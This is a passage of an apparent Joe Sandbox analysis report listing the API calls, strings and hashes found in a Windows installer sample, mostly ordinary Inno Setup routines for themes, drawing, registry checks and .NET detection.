                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoadVersion
                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                    • API String ID: 1968650500-2910565190
                                                    • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                    • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                    • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                    • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                    APIs
                                                    • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                    • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                    • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                    • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                    • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                    • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                    • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                    • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                    • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                    • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                    • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                    • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                    • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                    • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                    • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                    • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                    • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                      • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                    • String ID:
                                                    • API String ID: 1381628555-0
                                                    • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                    • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                    • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                    • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                    APIs
                                                    • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                    • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                      • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                    • API String ID: 2000705611-3672972446
                                                    • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                    • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                    • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                    • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                    • API String ID: 1452528299-3112430753
                                                    • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                    • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                    • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                    • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                    APIs
                                                    • GetVersion.KERNEL32 ref: 0045C9FA
                                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                      • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                    • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                    • API String ID: 59345061-4263478283
                                                    • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                    • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                    • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                    • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                    APIs
                                                    • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                    • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                    • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                    Strings
                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                    • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                    • IPersistFile::Save, xrefs: 004567FC
                                                    • CoCreateInstance, xrefs: 004565AB
                                                    • IPropertyStore::Commit, xrefs: 0045677D
                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                    • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance$FreeString
                                                    • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                    • API String ID: 308859552-3936712486
                                                    • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                    • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                    • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                    • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                    APIs
                                                    • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                    • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                    • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                    • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                    • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                    • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                    • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                    • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                    • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                    • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                    • DeleteDC.GDI32(?), ref: 0041B4D1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                    • String ID:
                                                    • API String ID: 359944910-0
                                                    • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                    • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                    • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                    • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                    APIs
                                                      • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                    • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                    • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                    • API String ID: 971782779-3668018701
                                                    • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                    • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                    • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                    • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                      • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                    • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                    • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                    • , xrefs: 004548D2
                                                    • RegOpenKeyEx, xrefs: 004548E4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$FormatMessageOpen
                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                    • API String ID: 2812809588-1577016196
                                                    • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                    • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                    • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                    • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                    APIs
                                                      • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                    Strings
                                                    • .NET Framework version %s not found, xrefs: 00459429
                                                    • .NET Framework not found, xrefs: 0045943D
                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                    • v4.0.30319, xrefs: 00459311
                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                    • v1.1.4322, xrefs: 004593E2
                                                    • v2.0.50727, xrefs: 0045937B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Close$Open
                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                    • API String ID: 2976201327-446240816
                                                    • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                    • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                    • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                    • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                    APIs
                                                    • CloseHandle.KERNEL32(?), ref: 0045889B
                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                    • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                    Strings
                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                    • Helper process exited., xrefs: 004588E5
                                                    • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                    • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                    • Helper isn't responding; killing it., xrefs: 004588A7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
